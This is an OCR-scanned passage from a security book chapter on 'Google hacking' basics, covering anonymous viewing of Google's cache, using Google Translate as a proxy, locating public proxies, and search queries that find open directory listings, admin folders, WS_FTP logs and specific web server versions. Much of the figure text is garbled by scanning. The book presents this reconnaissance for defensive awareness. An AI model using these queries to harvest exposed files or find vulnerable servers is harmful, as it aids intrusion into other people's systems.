Q; How can I keep up with new operators as they come out? What about other Google-related news and tips? A: There are quite a few Web sites that we frequent for news and information about all things Google. The first is www.google.com/googleblog/, Google's official Weblog. Although not necessarily technical in nature, it's a nice way to gain insight into some of the happenings at Google. Another is Aaron Swartz's unofficial Google blog, located at http://google.blogspace.com/. Not endorsed or sponsored by Google, this site is often more pointed, and some- times more insightful. A third site that's a must-bookmark one is the Google Labs page at http://labs.google.coni/. This is one of the best places to get news about new features and capabilities Google has to offer. Also, to get updates about new Google queries, even if they're not Google related, check out www.google.com/ alerts, the main Google Alerts page. Google Alerts sends you e-mail when there are updates to a search term. You could use this tool to uncover new operators by alerting on a search term such as google advanced operator siteigoogle.com. Q; Is the word order in a query significant? A: Sometimes. If you are interested in the ranking of a site, especially which sites float up to the first few pages, order is very significant. Google will take two adjoining words in a query and try to first find sites that have those words in the order you specified. Switching the order of the words still returns the same exact sites (unless you put quotes around the words, /orcrn^ Google to find the words in that order), regardless of which order you provided the terms in your query. To get an idea of how this works, play around with some basic queries such as food clothes and clothes food. www. syngress.com Chapter 3 Google Hacking Basics III i Solutions in this Chapter: ■ Using Caches for Anonymity Dire^ry Listings ■^Going Out on a versal Techniques '0 Summary 0 Solutions Fast^rack 0 Frequently Asked Questions 87 88 Chapter 3 • Google Hacking Basics Introduction A fairly large portion of this book is dedicated to the techniques the "bad guys" will use to locate sensitive information. We present this information to help you become better informed about their motives so that you can protect yourself and perhaps your customers. We've already looked at some of the benign basic searching techniques that are foundational for any Google user who wants to break the barrier of the basics and charge through to the next level: the ways of the Google hacker. Now we begin to look at the most basic techniques, and we'll dive into the weeds a bit later on. For now, we'U first talk about Google's cache. If you haven't already experi- mented with the cache, you're missing out. We suggest you at least click a few various cached links from the Google search results page before reading further. As any decent Google hacker will tell you, there's a certain anonymity that comes with browsing the cached version of a page. That anonymity only goes so far, and there are some limitations to the coverage it provides. Google can, however, very nicely veil your crawUng activities to the point that the target Web site might not even get a single packet of data from you as you cruise the Web site. We'll show you how it's done. Next, we'U talk about directory listings. These "ugly" Web pages are chock full of information, and their mere existence serves as the basis for some of the more advanced attack searches that we'U discuss in later chapters. To round things out, we'U take a look at a technique that has come to be known as traversing: the expansion of a search to attempt to gather more informa- tion. We'U look at directory traversal, number range expansion, and extension troUing, aU of which are techniques that should be second nature to any decent hacker — and the good guys that defend against them. Anonymity with Caches Google's cache feature is truly an amazing thing. The simple fact is that if Google crawls a page or document, you can almost always count on getting a copy of it, even if the original source has since dried up and blown away. Of course the down side of this is that hackers can get a copy of your sensitive data even if you've puUed the plug on that pesky Web server. Another down side of the cache is that the bad guys can crawl your entire Web site (including the areas you "forgot" about) without even sending a single packet to your server. If your Web server doesn't get so much as a packet, it can't write anything to the log files. www. syngress.com Google Hacking Basics • Chapter 3 89 (You are logging your Web connections, aren't you?) If there's nothing in the log files, you might not have any idea that your sensitive data has been carried away. It's sad that we even have to think in these terms, but untold megabytes, giga- bytes, and even terabytes of sensitive data leak from Web servers every day. Understanding how hackers can mount an anonymous attack on your sensitive data via Google's cache is of utmost importance. Google grabs a copy of most Web data that it crawls. There are exceptions, and this behavior is preventable, as we'll discuss later, but the vast majority of the data Google crawls is copied and fried away, accessible via the cached link on the search page. We need to examine some subtleties to Google's cached document banner. The banner shown in Figure 3.1 was gathered from www.phrack.org. Figure 3.1 This Cached Banner Contains a Subtle Warning About Images O O O www.phrack.org ^ \~< n |Glhttp://64.Z33.167.104/search7q=cache:Z7FncxDMrMU:www - Qj phrack This is G 0 a e's cache of hUD.jV'mvw cihrack.cire.'hardcC'Vertj^j' as retrisi'ed on Ssd 'i. 21.44.24 GMT. Go g 1 e's cache is the snapshot that we look of the page as we crawled the web. The paoe mav have chanoed since that time. Ciick here for the current paoe without hiohiiohtino. This cached oaoe mav reference imaoes which are no ionper available. CWck here for the cached text oniv. To linlt to or bool 64.233.167 .104.80 21: :39: :24, .719067 IP 64.233 .167 .104 .80 > 192.168.2. 32 .51670 21: :39: :24, .720351 IP 64.233.167 .104.80 > 192.168.2. 32 .51670 21: :39: :24, .731503 IP 192.168.2. 32 .51670 > 64.233.167 . 104 . 80 21: :39: :24, . 897987 IP 192.168.2. 32 .51672 > 82.165.25. 125 . 80 21: :39: :24, .902401 IP 192.168.2. 32 .51671 > 82.165.25. 125 . 80 21: :39: :24, .922716 IP 192.168.2. 32 .51673 > 82.165.25. 125.80 21: :39: :24, .927402 IP 192.168.2. 32 .51674 > 82.165.25. 125.80 21: :39: :25, .017288 IP 82.165.25. 125 . 80 > 192.168.2. 32 .51672 21: :39: :25, .019111 IP 82.165.25. 125 . 80 > 192.168.2. 32 .51672 21: :39: :25, .019228 IP 192.168.2. 32 .51672 > 82.165.25. 125.80 21: :39: :25, . 023371 IP 82.165.25. 125 . 80 > 192.168.2. 32 .51671 21: :39: :25, . 025388 IP 82.165.25. 125 . 80 > 192.168.2. 32 .51671 : o y : : z 0 . . \J Zd /jo IP 1 Q O 1 C Q O TO C 1 C T 1 O Z . D lO / 1 > Q O 1 C R OR OZ . 1 0 0 . Z D . IOC on ±Zd . d U 21: :39: :25, . 043418 IP 82.165.25. 125 . 80 > 192.168.2. 32 .51673 21: ;39: :25, . 045573 IP 82.165.25. 125.80 > 192.168.2. 32 .51673 21: :39: :25, . 045707 IP 192.168.2. 32 .51673 > 82.165.25. 125 . 80 21: :39; :25, . 052853 IP 82.165.25. 125.80 > 192.168.2. 32 .51674 Let's take apart this output a bit. On line 1, we see a Web (port 80) connec- tion from 192.168.2.32, our Web browsing machine, to 64.233.167.104, one of Google's servers. Lines 2 and 3 show two response packets, again from the Google server. This is the type of traffic we should expect from any transaction from Google, but beginning on line 5, we see that our machine makes a Web (port 80) connection to 82. 165.25. 125. This is not a Google server, and if we were to run an nslookup or a host command on that IP address, we would dis- cover that the address resolves to al5151295.alturo-server.de. The connection to this server can be explained by rerunning tcpdump with more options specifically designed to show a few hundred bytes of the data inside the packets as weU as the headers. The partial capture shown in Figure 3.3 was gathered by running: tcpdump -Xx -s 500 -n and shift-reloading the cached page. Shift-reloading forces most browsers to con- tact the Web host again, not relying on any caches the browser might be using. www. syngress.com Google Hacking Basics • Chapter 3 Figure 3.3 A Partial HTTP Request Showing the Host Header Field 0x0040 0d6c 4745 5420 2f67 7266 782f 3831 736d .IGET. /grfx/81sm 0x0050 626c 7565 2e6a 7067 2048 5454 502f 312e blue. jpg. HTTP/1. 0x0060 310d Oa48 6f73 743a 2077 7777 2e70 6872 1. .Host: .www.phr 0x0070 6163 6b2e 6f72 670d 0a43 6f6e 6e65 6374 ack.org. .Connect 0x0080 696f 6e3a 2 0 6b 6565 702d 616c 6976 650d ion: .keep-alive. 0x0090 0a52 6566 6572 6572 3a20 6874 7470 3a2f . Ref erer : . http : / OxOOaO 2f36 342e 3233 332e 3136 312e 3130 342f /64. 233. 161. 104/ UXU UJDU 1 '3 CZ C. /Job D 1 / Z C T C Q D J D O 3 t / 1 0 1 0-5 Q C C DODO seairc]i?q— cache : L OxOOcO 4251 5a49 7253 6b4d 6755 4a3a 7777 772e BQ Z I r S kMgU J : www . OxOOdO 7068 7261 636b 2e6f 7267 2f2b 2b73 6974 phrack .org/++sit OxOOeO 653a 7777 772e 7068 7261 636b 2e6f 7267 e : www . phrack . org OxOOfO 2b7 0 6872 6163 6b2 6 686c 3d65 6e0d 0a55 +phrack&hl=en . .U Lines 1 and 2 show that we are downloading (via a GET request) an image file — specifically, a JPG image irom the server. Line 3 shows the Host field, which specifies that we are talking to the www.phrack.org Web server. Because of this Host header and the fact that this packet was sent to IP address 82.165.25.125.80, we can safely assume that the Phrack Web server is virtually hosted on the phys- ical server located at 82. 165.25. 125:80. This means that when we viewed the cached copy of the Phrack Web page, we began pulling images directly from the Phrack server itself. If we were striving for anonymity by viewing the Google cached page, we just blew our cover! Furthermore, lines 6—12 show that the REFERER field was passed to the Phrack server, and that field contained a URL reference to Google's cached copy of Phrack's page. This means that not only were we not anonymous, our browser informed the Phrack Web server that we were trying to view a cached version of the page! So much for anonymity. It's worth noting that most real hackers use proxy servers when browsing a target's Web pages, and even their Google activities are first bounced off a proxy server. If we had used an anonymous proxy server for our testing, the Phrack Web server would have only gotten our proxy server's IP address, not our actual IP address. 92 Chapter 3 • Google Hacking Basics Underground Googling Google Hacker's Tip It's a good idea to use a proxy server if you value your anonymity online. Penetration testers use proxy servers to emulate what a real attacker would do during an actual break-in attempt. Locating working, high- quality proxy servers can be an arduous task, unless of course we use a little Google hacking to do the grunt work for us! To locate proxy servers using Google, try these queries: inurl : "nph-proxy. cgi " "Start browsing" or 'this proxy is working fine!" "enter " URL* visit These queries locate online public proxy servers that can be used for testing purposes. Nothing like Googling for proxy servers! Remember, though, that there are lots of places to obtain proxy servers, such as the atomintersoft site or the samair.ru proxy site. Try Googling for those! The cache banner gives us an option to view only the data that Google has captured, without any external references. As you can see in Figure 3.1, a Unk is available in the header, titled "Click here for the cached text only." Clicking this link produces the tcdump output shown in Figure 3.4, captured with tcpdump —n. Figure 3.4 Cached Text Only Captured with Tcpdump IP 192.168.2.32.52912 > 64.233.167.104.80: S 2 0 5773 4012:2 05773 4012(0) win 65535 IP 64.233.167.104.80 > 192.168.2.32.52912: S 42 0502 895 6:42 0502 895 6(0) ack 2057734013 win 8190 IP 192.168.2.32.52912 > 64.233.167.104.80 IP 192.168.2.32.52912 > 64.233.167.104.80 IP 64.233.167.104.80 > 192.168.2.32.52912 . ack 1 win 65535 P 1:699(698) ack 1 win 65535 . ack 699 win 15885 WWW. syngress.com Google Hacking Basics • Chapter 3 93 IP 64.233.167.104.80 > 192.168.2.32.52912: . 1:1431(1430) ack 699 win 15885 23:46:54.127202 IP 64.233.167.104.80 > 192.168.2.32.52912: . 1431:2861(1430) ack 699 win 15885 IP 64.233.167.104.80 > 192.168.2.32.52912: P 2861:3846(985) ack 699 win 15885 IP 192.168.2.32.52912 > 64.233.167.104.80: IP 192.168.2.32.52912 > 64.233.167.104.80: IP 64.233.167.104.80 > 192.168.2.32.52912: IP 192.168.2.32.52912 > 64.233.167.104.80: . ack 3846 win 65535 F 699:699(0) ack 3846 win 65535 F 3846:3846(0) ack 700 win 8190 . ack 3847 win 65535 Lines 1-3 show a standard TCP handshake on the Web port (port 80) between our browsing machine (192.168.2.32) and the Google server (64.233.167.104). Lines 4—9 show our Web data transfer as our browsing machine receives data from the Google server, and lines 10—12 show the normal successful shutdown of our communication with the Google server. Despite the fact that we loaded the same page as before, we communicated only with the Google server, not any external servers. If we were to look at the URL generated by clicking the "cached text only" link in the cached page's header, we would discover that Google appended an interesting parameter, &strip=i. This parameter forces a Google cache URL to dis- play only cached text, avoiding any external references. This URL parameter only applies to URLs that reference a Google cached page. PuUing it aU together, we can browse a cached page with a fair amount of anonymity without a proxy server using a quick cut and paste and a URL modi- fication. As an example, let's say that we used a Google query site: phrack.org inurl -.hardcover, which returns one result. Instead of clicking the cached link, we wiU right-click the cached link and copy the URL to the Clipboard, as shown in Figure 3.5. Browsers handle this action differently, so use whichever technique works for you to capture the URL of this link. www. syngress.com 94 Chapter 3 • Google Hacking Basics Figure 3.5 Anonymous Cache Viewing Via Cut and Paste Google Search: siteiwww.phrack.org inurl:hardcover62 lnttp7/www.google.coin/search7hl=en&lr=&ie=Ul " Q- Gougle Web Images Groups News Froogle more » ' /■~ TA Advanced Se-Brch I L Search J p^ferancas 5 i (e .www. p hfac k.of g i r u ri : h ardcov-e r62 Web Results 1 - 1 of 1 from www.phrack.arg for inurl:hardcoverC2. (0.19 sscortds) Tip: Try Gooole Answers for help from expert researchers www.phrack.org Collocated Unix Server - SSSMonth, home | about | all articles | all authors | all comments | download | search submit article | loopback commentaries | editor ... www.phrack.org/hardcover62/ - 5k - Cachpri - Similar nanos Open Link in New Window Open Link In New Tab Save Linked File As... Copy Link to Clipboard Once the URL is copied to the Clipboard, paste it into the address bar of your browser, and append the &strip=l parameter to the end of the URL. The URL should now look something like http://216.239. 41. 104/search?q= cache : ZTFntxDMrMIJ : www.phrack. org/hardcover62 / + +site : www.phrac k.org+inurl:hardcover62&hl=en&strip=l. Press Enter after modifying the URL to load the page, and you should be taken to the stripped version of the cached page, which has a slightly different banner, as shown in Figure 3.6. Figure 3.6 A Stripped Cached Page's Header a o f » www.phrack.org Jhitp://216.Z39.41.104/search?q=cache:Z7Fi - sita:phrack.ofg inurhhardcover This is G 0 g 1 e's text-only cache of \niioJfv/m,\ phrack. Qrci/hardcover^l-/ as retrieved on Sep 3, 2D04- 2V^ Go g I e's cache is the snapshot that we took of the page as we crawled the web. The page may have changed since that time. Click here for the current page without highlighting. Click here for the full cached paoe with images included. To link to or bookmark this page, use the following uri: http : //ww. google . com/ search j q=cache ; Z TFntxDMxMIJ :www. p-hrac^^ .org/hardcoverSS/ + + Bite ; vw. plrjracl^ . org + inurlj hardcover S2 tl Google is ncn ajfiliaxed with thg aulhors oj this page nor responsibl'e ]or i:s £omenx. These terms only appear in links pointing to this page: hardcover62 Display a mEnu WWW. syngress.com Google Hacking Basics • Chapter 3 95 Notice that the stripped cache header reads differently than the standard cache header. Instead of the "This cached page may reference images which are no longer available" line is a new line that reads, "Click here for the fuU cached version with images included." This is an indicator that the current cached page has been stripped of external references. Unfortunately, the stripped page does not include graphics, so the page could look quite different from the original, and in some cases a stripped page might not be legible at aU. If this is the case, it never hurts to load up a proxy server and hit the page, but real Google hackers "don't need no steenkin' proxy servers!" Underground Googling... Fun with Highlights If you've ever scrolled through page after page of a document looking for a particular word or phrase, you probably already know that Google's cached version of the page will highlight search terms for you. What you might not realize is that you can use Google's highlight tool to highlight terms on a cached page that weren't included in your original search. This takes a bit of URL mangling, but it's fairly straightforward. For example, if you searched for peeps marshmallows and viewed the first cached page, the tail end of that URL would look something like www.marsh- mallowpeeps.com/news/press_peeps_spring_2004. html + peeps+marsh- mallows&hl=en. To highlight other terms, simply play around with the area after the target URL, in this case + peeps + marshmallows. Simply add or subtract words and press Enter, and Google will highlight the terms right in your browser! Using Google as a Proxy Server Although this technique might not work forever, at the time of this writing it's possible to use Google itself as a proxy server. This technique requires a Google- translated URL and some minor URL modification. To make this work, we first need to generate a translation URL. The easiest way to do this is through Google's translation service, located at www.google.com/translate_t. If you were to enter a URL into the "Translate a web page" field, select a language pair, and www. syngress.conn 96 Chapter 3 • Google Hacking Basics click the Translate button, as shown in Figure 3.7, Google would translate the contents of the Web page and generate a translation URL that could be used for later reference. Figure 3.7 Google's Translate Page is the Best Way to Generate a Translation URL O O Translate [ ^ li^- ] [ C ] |G]hitp://wvAv.goo9le,com/iranslace_i " ^C^r google translate a Got jgle All About Gooole << Back to Lanouaoe Tools Translate Translate text I fpQin [ Cemnan to English ^Translate j Translate a web page http : V /vmw.goog I e.com fpom' English to Spanlsli hyj f Transtate 3 3 Home - Advertise with Us - Md Googls to Your Site - Mews and Resoupces - LarHuags Tools - Jobs, Press. Cool Stuff... 1^ Disp lay a The URL generated from this page might look like this: http : / /www. google . com/translate?u=http%3A%2F%2Fwww. google . com&langpair=en%7C es&hl=en&ie=Unknown&oe=ASCII We discussed most of the parameters in this URL in Chapter 1 , but we haven't talked about the langpair parameter yet. This parameter, which is only available for the translation service, describes which languages to translate to and from, respectively. The arguments to this parameter are identical to the hi parame- ters we saw in Chapter 1. Figure 3.7 shows that we were attempting to translate the www.google.com Web page from English to Spanish, which generated a lang- pair of en and es. Here's where the hacker mentality kicks in. What would happen if we were to translate a page from one language into the same language? This would change our translation URL to: http : / /wmj . google . com/translate?u=http%3A%2F%2Fwww. google . com&langpair=en%7C en&]il=en&ie=Unknown&oe=ASCII WWW. syngress.com Google Hacking Basics • Chapter 3 If we loaded this URL into our browser, and if the source page were in English to begin with, we would see a page like the one shown in Figure 3.8. Figure 3.8 Google Translating Itself from English to English?! f3 O O Translated version of http;//www.google>comy ^ I C I Ohttp://www.google.com/lranslate?u=http?fi3A%2 " O,- | This page has been automaHcalk translated from English. Vi&w Oriciiiial W&b Page m Printabla Version [El Back to Resute Google Web Images Groups News Frooole more tt f Coogte Sgan:^ ^ f Tm Feeling Lucky^ PmfBmn::fl& Language Toola Advertising Pnoqrams - Business Solutions - About Googie Gaogb - Saarshing 4.2€5,ig3.774 wab paga« First, you should notice that the Google search page in the bottom frame of the browser window looks pretty familiar. In fact, it looks identical to the orig- inal search page. This is because no real language translation occurred. The top frame of the browser window shows the standard translation banner. Admittedly, all this work seems a bit anticlimactic, since all we have to show for our efforts is an exact copy of a page we could have just loaded directly. Fortunately, there is a payoff when we consider what happens behind the scenes. Let's look at another example, this time translating the www.phrack.org/hardcover62/ Web page, monitoring network traffic with tcpdump -n -U -t as shown in Figure 3.9. Figure 3.9 Monitoring English to English Translation with Tcpdump -n -U -t IP 192 .16! 3.2.32.53466 > 64 233 171.104.80: S 1120160740 1120160740(0) win IP 64 .233 171.104.80 > 192 168 2.32.53466: S 2337757854 2337757854(0) ack IP 192 .16f 3.2.32.53466 > 64 233 171.104.80: ack 1 IP 192 .16f 3.2.32.53466 > 64 233 171.104.80: P 1:678(677) ack IP 64 .233 171.104.80 > 192 168 2.32.53466: ack 678 IP 64 .233 171.104.80 > 192 168 2.32.53466: P 1:529 (528) ack IP 192 .16? 3.2.32.53466 > 64 233 171.104.80: ack 529 Chapter 3 • Google Hacking Basics IP 64 . 233 . 171.104.80 > 192.168.2.32.53466: P 529:549(20) ack IP 192 .168 .2.32.53466 > 64.233.171.104.80: P 678:1477(799) ack [snip] IP 192 .168 .2 .32 .53470 > 216.239.37.104.80: S 3691660195:3691660195 0 ) win IP 216 .239 .37.104.80 > 192.168.2.32.53470: S 2 47 082 6704:247 082 67 04 (0) ack IP 192 .168 .2.32.53470 > 216.239.37.104.80: ack 1 IP 192 .168 .2.32.53470 > 216.239.37.104.80: P 1:752(751) ack IP 216 .239 .37.104.80 > 192.168.2.32.53470: P 1:1271(1270) ack IP 216 .239 .37.104.80 > 192.168.2.32.53470: P 1271:1692(421) ack IP 216 .239 .37.104.80 > 192.168.2.32.53470: P 1692:1712(20) ack IP 192 .168 .2.32.53470 > 216.239.37.104.80: ack 1712 In lines 1—3, we see our Web browsing machine (192.168.2.32) connecting to a Google Web server (64.233.171.104) on port 80. Data is transferred back and forth in lines 4—9, and another similar connection is established between the same addresses at line 10, removed for brevity. In lines 11—13, om^ Web browsing machine (192.168.2.32) connects to another Google Web server (216.239.37.104) on port 80. Data is transferred back and forth in lines 14-18, and the www.phrack.org/hardcover62/ Web page is displayed in our browser, as shown in Figure 3.10. In this example, no data was transferred directly between our Web browsing machine and the phrack.org Web site! When we submitted our modified translation URL, Google fetched the Web page for us and passed the contents of the page back to our browser. Google, in essence, acted as a proxy server for our request. Figure 3.10 Google Acting as a Transparent Proxy Server O O O Translated version of http;//www.phraGk.org/hardcover62/ \ 1 OhTtp://www.goo9la.corn/irarisla:e?iJ=littp://w\iww,phrack.org/hardcover62/&larigpair=erSiS7CenCv^ " Go^l^ [■■Display a menu This page has been automatically translated from English. View Oriqinail Web Page a PririlablE Versi horns I I all article | all authors | all opmments j download | ssareh 5/Mijnth submit article | loopback commentaries | editor In chief For the second time In history are we releasing a HARDCOVER version of Phrack. The 164 pages, booklet Is given OLt for free at RuxcOn . This Is an exclusive release. We do not sell or ship them. Th« Qnllne version of Phrack #62 will be released next MONDAY. EXAHPLES FROM THE HARDCOVER RELEASE **** I www.syngress.com Google Hacking Basics • Chapter 3 99 This is not a perfect proxy solution and should not be used as the sole proxy server in your toolkit. We present it simply as a example of what a little creative thinking can accomplish. While Google is acting as a proxy server, it is a trans- parent proxy server, which means the target Web site can still see our IP address in the connection logs, despite the fact that Google grabbed the page for us. Underground Googling Test Your Proxy Server! If you are conducting a test that requires you to protect your IP address from the target, use a proxy server and test it with a proxy checker like the one available from www.all-nettools.com/pr.htm. If you use this page to check the "Google proxy," you'll discover that it affords little protection for your IP address. Directory Listings A directory listing is a type of Web page that lists files and directories that exist on a Web server. Designed to be navigated by cUcking directory links, directory Ust- ings typically have a title that describes the current directory, a list of files and directories that can be clicked, and often a footer that marks the bottom of the directory listing. Each of these elements is shown in the sample directory listing in Figure 3. 11. Figure 3.11 A Directory Listing Has Several Recognizable Elements n o o Index of /security/dist Index of /security/dist Laafc modified Size DeaeriptioTi Parent Direcfeory 13 KEYS ^) c-librarv/ ^3 1 ava-librarv / 26-Mar-2003 03:34 4.3K 24-Mai:-2004 02:46 l7-Apr-2004 18:36 Apache/2,0^2 {Unix) Server at xmljopachejors Port 80 www. syngress.com 100 Chapter 3 • Google Hacking Basics Much like an FTP server, directory listings offer a no-friUs, easy-instaU solu- tion for granting access to files that can be stored in categorized folders. Unfortunately, directory listings have many faults, specifically: ■ They are not secure in and of themselves. They do not prevent users from downloading certain files or accessing certain directories. This task is often left to the protection measures built into the Web server soft- ware or third-party scripts, modules, or programs designed specifically for that purpose. ■ They can display information that helps an attacker learn specific tech- nical details about the Web server. ■ They do not discriminate between files that are meant to be public and those that are meant to remain behind the scenes. ■ They are often displayed accidentally since many Web servers display a directory listing if a top-level index file (index.htm, index.html, default, asp, and so on) is missing or invalid. All this adds up to a deadly combination. In this section, we'U take a look at some of the ways Google hackers can take advantage of directory listings. Locating Directory Listings The most obvious way an attacker can abuse a directory listing is by simply finding it! Since directory listings offer "parent directory" links and allow browsing through files and folders, even the most basic attacker might soon dis- cover that sensitive data can be found by simply locating the listings and browsing through them. Locating directory listings with Google is fairly straightforward. Figure 3.11 shows that most directory listings begin with the phrase "Index of," which also shows in the title. An obvious query to find this type of page might be ntitle: index, of, which could find pages with the term index of in the title of the document. Remember that the period (".") serves as a single-character wildcard in Google. Unfortunately, this query wiU return a large number of false positives, such as pages with the following titles: Index of Native American Resources on the Internet LibDex - Worldwide index of library catalogues Iowa State Entomology Index of Internet Resources WWW. syngress.com Google Hacking Basics • Chapter 3 101 Judging from the titles of these documents, it is obvious that not only are these Web pages intentional, they are also not the type of directory listings we are looking for. As Ben Kenobi might say, "This is not the directory listing you're looking for." Several alternate queries provide more accurate results — for example, intitle: index, of "parent directory" (shown in Figure 3.12) or intitledndex.of name size. These queries indeed provide directory listings by not only focusing on index, of in the title but on keywords often found inside directory listings, such as parent directory, name, and size. Even judging from the summary on the search results page, you can see that these results are indeed the types of directory list- ings we're looking for. Figure 3.12 A Good Search for Directory Listings o o o Google Search: intitleiindex. of "parent directory" C I |G]littp://www.goo9le.corn/sear<:h?q= intitle:! " O^^ intitleiindex. of "parent directory" Gougle Web Images Groups News Froogle more » I intitle: index.of "parent directorv" ^^^^ P„fa„n^s Web Results 1 - 10 of about 4,660,000 for intitle: index. of "parent directory". (O.Sfi secorvds) Index of /images Index of /images. Name Last modified Size Description Parent Directory 29-Jui-2004 1B:36 - Actions/ 12-Dec-2003 14:44 - Animation; ia-Aug-2004 12:24 - Baiis/ IS ... v\ww. c it. 3U.edu.auy images/ - 26l< - Cached - Similar pacies Index of/dist Index of/dist. ... Parent Directory - DATE 12-Sef>-201)4 17:47 11 SOURCE 05-Sep-20[H 07:21 16 anU 16-Jui-20[)4 02:1 S - apr/ 02-Sep-2004 09:47 - avaion/ 2S-May-2004 09 ... apache. org' disf - - Sep 12, 2004 - Cached - Similar pages Index of/dist/httpd Index of /disUhttpd. ... Parent Directory - HTTP Server project binaries/ 19-Jul-2004 04:49 - Binary distributions docs/ 12-Sep-2004 06:02 - Extra documentation ... www.apache.orgi'dlsUhttpd/ - 11k - Sep 12, 2004 - Cached - Similar pages [ More results from vww. apache. org ] I Finding Specific Directories In some cases, it might be beneficial not only to look for directory listings but to look for directory listings that allow access to a specific directory. This is easily accomplished by adding the name of the directory to the search query. To locate "admin" directories that are accessible from directory listings, queries such as intitle nndex. of. admin or intitle: index, of inurl: admin will work well, as shown in Figure 3.13. www. syngress.conn 102 Chapter 3 • Google Hacking Basics Figure 3.13 Locating Specific Directories in a Directory Listing I f3 O Google Search: intitleiindex.of Bnjrhadmin^^^^^^^^^^H ||[ M " I I C ] [C] http://www.goo9le.com/search7hl * Q-' intitle:index.of inurl:admin| GoiJgle Web Images Groups News Froogle more » intille:index.oF inurliadnnin ( Search ) ^ Web Results 1 - 10 of about 22,000 for intitleiindex.of inurliadmin. (0.39 seconds) Index of /admin/hurricane-plan Index of yadminyhurricane-plan. Name Last modified Size Description Parent Directorv - Disaster-Phone.pdf 01-Sep-2t)t>4 09:47 18K disaster ... wiww.heaithi.ufi.edu/admin/hurricane-plani - 3lt - Cached - Similar paaes Index of /admin/dss/ Index of /admin/dss/. Name Last modified Size Description [DIR] Parent Directory www.state.ak.us/admin/dss/ - Ik - Cached - Similar paaes Index of /admin/alumni/sharks/cimBT Index of /admm/alumni/sharks/cim97. Name Last modified Size Description Parent Directory - cim 25-Oct-1996 11;50 2.7K cimiinx.txt ... www.brunel.ac.uk/adnnin/alumni/sharks/cim97/ - 3k - Cached - Similar pages Finding Specific Files Because of the directory tree style, it is also possible to find specific files in a directory listing. For example, to find WS_FTP log files, try a search such as intitle: index. of ws^tp.log, as shown in Figure 3. 14. This technique can be extended to just about any kind of file by keying in on the index. of in the title and the file- name in the text of the Web page. Figure 3.14 Locating Files in a Directory Listing ^ f3 O Google Search: intitle; index. of w5„ftp.lQg < ^ I [c] iGlhttp ://www.google.com/search?q=iiititle:i " Qj intitle:index. of ws_ftp.log Google Web Images Groups News Froogle more » intill.e:index.of w^_ltp.log ; C Search^ fej^ Web Results 1 ID of about 101,000 for intitleiindex.of ws_flp.log. (0.69 seconds) Index Of J-nbessets/WS FTP. LOG Index of ,''^nbessBlsyWS_FTP.LOG. Name Last modified Size Description Parent Directory 02-Sep-2002 1 1i14 - images/ 23-Au^2002 19:03 ... home.tiscali.nl/-nbesselsWS FTP. LOG/ -1k- Cached - Similar Index of /mp3 Index of /mp3. ... 31-May-2001 1B;53 1.BM VandalsDesertWoman.mp3 31-May-2001 18i39 1.3M VandaisRIght On Q.mp3 26-Sep-20t)1 18:46 1.8M WS_FTP.LOG 31-May-2mi 18:B3 Ik . kungfurecords.com/mp3/ - ISk - Sep 12, 20D4 - Cached - Similar pages Index of /gallery Index of /gallery. ... 2004 20:45 IBk Fgallerya-1.jpg 20-Apr-2004 20:45 29k Foreverthb.jpg 20-Apr-2004 20:45 10k Thumbs.db 03-Sep-2004 10:52 95Sk WS_FTP.LOG ... wmv.inspired-art.com/9ailery/ - 25k - Cached - Similar pages WWW. syngress.com Google Hacking Basics • Chapter 3 103 You can also use filetype and inurl to search for specific fdes.To search again for ws^tp.log fdes, try a query like filetype: log inurV.ws^tp.log. This technique will generally find more results than the somewhat restrictive index, of search. We'll be working more with specific file searches throughout the book. Server Versioning One piece of information an attacker can use to determine the best method for attacking a Web server is the exact software version. An attacker could retrieve that information by connecting directly to the Web port of that server and issuing a request for the HTTP (Web) headers. It is possible, however, to retrieve similar information fi^om Google without ever connecting to the target server. One method involves using the information provided in a directory listing. Figure 3.15 shows the bottom portion of a typical directory listing. Notice that some directory Ustings provide the name of the server software as well as the version number. An adept Web administrator could fake these server tags, but most often this information is legitimate and exactly the type of information an attacker will use to refine his attack against the server. Figure 3.15 This Server Tag Can Be Used to Profile a Web Server O O e Index of / < > I [~C~] 0 http:// www.3dQ.com/ " 'Q- intitieiindex. of "server at" Qjj e3-euro2 / 1& 52 eS-eurox/ 19 53 i a eked/ 05-Dec-2003 03 22 iumoqate/ 04-Dec-2003 00 14 05-Dec-2003 02 05 Apachef 1 327 Server at www 3do .com Port 80 The Google query used to locate servers this way is simply an extension of the intitle:index.of query. The listing shown in Figure 3.15 was located with a query o( intitle: index, of " server at". This query will locate all directory listings on the Web with index of in the title and server at anywhere in the text of the page. www. syngress.com Chapter 3 • Google Hacking Basics This might not seem like a very specific search, but the results are very clean and do not require further refinement. Underground Googling Server Version? Who Cares? Although server versioning might seem fairly harmless, realize that there are two ways an attacker might use this type of information. If the attacker has already chosen his target and discovers this information on that target server, he could begin searching for an exploit (which might or might not exist) to use against that specific software version. Inversely, if the attacker already has a working exploit for a very specific version of Web server software, he could perform a Google search for targets that he can compromise with that exploit. An attacker, armed with an exploit and drawn to a potentially vulnerable server, is especially dangerous. Even small information leaks like this can have big payoffs for a clever attacker. To search for a specific server version, the intitle:index.of query can be extended even further to something like intitlenndex. of "Apache/1.3.27 Server at". This query would find pages like the one listed in Figure 3.15. As shown in Table 3.1, many different servers can be identified through a directory listing. Table 3.1 Some Specific Servers Locatable Via Directory Listings Directory Listing of Web Servers "An Web/ 1 . 42h " intitle : index.of "Apache Tomcat/" intitle: index.of "Apache-AdvancedExtranetSen/er/" intitle: index.of "Apache/ df-exts " intitle : index, of "Apache/" "server at" intitle: index.of "Apache/ AmEuro " intitle: index. of "Apache/Blast" intitle: index.of "Apache/WWW" intitle : index.of "Apache/ df-exts " intitle : index, of Continued www. syngress.com Google Hacking Basics • Chapter 3 105 Table 3.1 Some Specific Servers Locatable Via Directory Listings Directory Listing of Web Servers "CERN httpd 3. OB (VAX VMS)" intitle:index.of fitweb-wwws * server at intitle: index. of "HP Apache-based Web "Server/1 .3.26" intitle: index.of "HP Apache-based Web "Server/1.3.27 (Unix) mod_ssl/2.8. 1 1 OpenSSL/0. 9. 6g " intitle : index.of "httpd+ssl/kttd" * server at intitle: index.of "JRun Web Server" intitle: index.of "MaXX/3. 1 " intitle: index.of "Microsoft-IIS/* server at" intitle: index.of "Microsoft-IIS/4.0" intitle: index.of "Microsoft-IIS/ 5.0 server at" intitle: index.of "Microsoft-IIS/6.0" intitle: index.of "OmniHTTPd/2.10" intitle: index.of "Opens A/ 1.0.4" intitle : index.of "Oracle HTTP Server Powered by Apache" intitle: index.of "Red Hat Secure/2.0" intitle: index.of "Red Hat Secure/3.0 server at" intitle: index.of SEDWebserver * server -\-at intitle: index.of Figure C.2 Directory Listings of 